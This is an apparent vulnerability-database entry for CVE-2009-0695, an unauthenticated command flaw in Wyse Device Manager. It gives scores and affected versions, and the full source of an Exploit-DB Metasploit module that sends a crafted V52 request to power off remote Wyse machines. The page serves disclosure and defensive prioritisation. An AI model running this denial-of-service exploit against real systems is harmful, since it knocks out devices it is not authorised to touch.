CVE-2009-0695

high

Published 2012-06-19 · Modified 2026-04-29

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

8.5

Description

hagent.exe in Wyse Device Manager (WDM) 4.7.x does not require authentication for commands, which allows remote attackers to obtain management access via a crafted query, as demonstrated by a V52 query that triggers a power-off action.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-19137 dos hardware ruby · 3 KB

it.solunium · 2012-06-14

Wyse - Machine Remote Power Off (Denial of Service) (Metasploit)

ruby exploit Source: Exploit-DB

require 'msf/core'

class Metasploit3 < Msf::Auxiliary
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Auxiliary::Dos

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Wyse Machine Remote Power off (DOS)',
			'Description'    => %q{
					This module exploits the Wyse Rapport Hagent service and cause
                                        remote power cycle (Power off the wyse machine remotely).
			},
			'Stance'         => Msf::Exploit::Stance::Aggressive,
			'Author'         => 'it.solunium@gmail.com',
			'Version'        => '$Revision: 14976 $',
			'References'     =>
				[
					['CVE', '2009-0695'],
					['OSVDB', '55839'],
					['US-CERT-VU', '654545'],
					['URL', 'http://snosoft.blogspot.com/'],
					['URL', 'http://www.theregister.co.uk/2009/07/10/wyse_remote_exploit_bugs/'],
					['URL', 'http://www.wyse.com/serviceandsupport/support/WSB09-01.zip'],
					['URL', 'http://www.wyse.com/serviceandsupport/Wyse%20Security%20Bulletin%20WSB09-01.pdf'],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Targets'        =>
				[
					[ 'Wyse Linux x86', {'Platform' => 'linux',}],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Jun 13 2012'
		))

		register_options(
			[
				Opt::RPORT(80),
			], self.class)
	end


	def run

		
		# Connect to the target service
		print_status("Connecting to the target #{rhost}:#{rport}")
		if connect
                print_status("Connected...")
                end

		# Parameters

                genmac     = "00"+Rex::Text.rand_text(5).unpack("H*")[0]

		craft_req = '&V52&CI=3|'
                craft_req << 'MAC=#{genmac}|#{rhost}|'
                craft_req << 'RB=0|MT=3|'
                craft_req << '|HS=#{rhost}|PO=#{rport}|'
                craft_req << 'SPO=0|' 

                # Send the malicious request
		sock.put(craft_req)

		# Download some response data
		resp = sock.get_once(-1, 10)
		print_status("Received: #{resp}")

                disconnect

		if not resp
			print_error("No reply from the target, this may not be a vulnerable system")
			return
		end

		if resp == '&00'
                print_status("#{rhost} execute command succefuly & power off.")
                return
                end

                #Exeptions
		rescue ::Rex::ConnectionRefused 
			print_status("Couldn't connect to #{rhost}:#{rport} | Connection refused.")
                rescue ::Rex::HostUnreachable
			print_status("Couldn't connect to #{rhost}:#{rport} | Host unreachable")
                rescue  ::Rex::ConnectionTimeout
			print_status("Couldn't connect to #{rhost}:#{rport} | Connection time out")
		rescue ::Errno::ECONNRESET, ::Timeout::Error
			print_status("#{rhost} not responding.")

	end
end

EDB-9934 remote multiple verified

kf · 2009-07-10

Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit)

Source code queued for fetch — refresh in a moment.

Metasploit modules

exploit_multi/wyse/hagent_untrusted_hsdata rank 600

Wyse Rapport Hagent Fake Hserver Command Execution

Source fetch failed: fetch_error — view the original via the link above.

Application impact

Vendor	Product	Versions
dell	wyse_device_manager	`4.7.0`
dell	wyse_device_manager	`4.7.1`
dell	wyse_device_manager	`4.7.2`

References

CWEs

CWE-287

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.